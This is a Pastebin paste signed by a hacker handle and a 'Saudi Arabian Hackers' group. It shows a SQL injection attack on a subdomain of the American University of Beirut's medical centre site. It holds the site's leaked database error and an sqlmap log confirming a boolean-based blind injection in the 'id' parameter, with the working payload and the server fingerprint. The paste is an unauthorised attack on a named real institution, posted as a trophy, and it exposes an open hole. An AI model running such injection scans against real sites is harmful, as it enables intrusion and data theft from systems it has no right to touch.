Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- JM511 Was Here :)
- Saudi Arabian Hackers
- =========================
- الجامعة الامريكية في بيروت
- =========================
- ثغرة حقن
- =========================
- Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
- [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id = 40''.
- /users/subpage.asp, line 10
- aubmc.org.lb
- sqlmap/0.9 - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [*] starting at: 20:29:14
- [20:29:14] [INFO] using '/home/jm511/.sqlmap/output/www.intmed.aubmc.org.lb/session' as session file
- [20:29:15] [INFO] testing connection to the target url
- [20:29:16] [INFO] testing if the url is stable, wait a few seconds
- [20:29:19] [INFO] url is stable
- [20:29:19] [INFO] testing if GET parameter 'id' is dynamic
- [20:29:20] [INFO] confirming that GET parameter 'id' is dynamic
- [20:29:21] [INFO] GET parameter 'id' is dynamic
- [20:29:22] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: Microsoft Access)
- [20:29:22] [INFO] testing sql injection on GET parameter 'id'
- [20:29:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [20:29:26] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
- parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
- [20:31:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
- GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
- sqlmap identified the following injection points with a total of 15 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id=150 AND 485=485
- ---
- [20:31:33] [INFO] testing Microsoft Access
- [20:31:34] [INFO] confirming Microsoft Access
- [20:31:36] [INFO] the back-end DBMS is Microsoft Access
- web server operating system: Windows 2003
- web application technology: ASP.NET, Microsoft IIS 6.0, ASP
- back-end DBMS: Microsoft Access
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement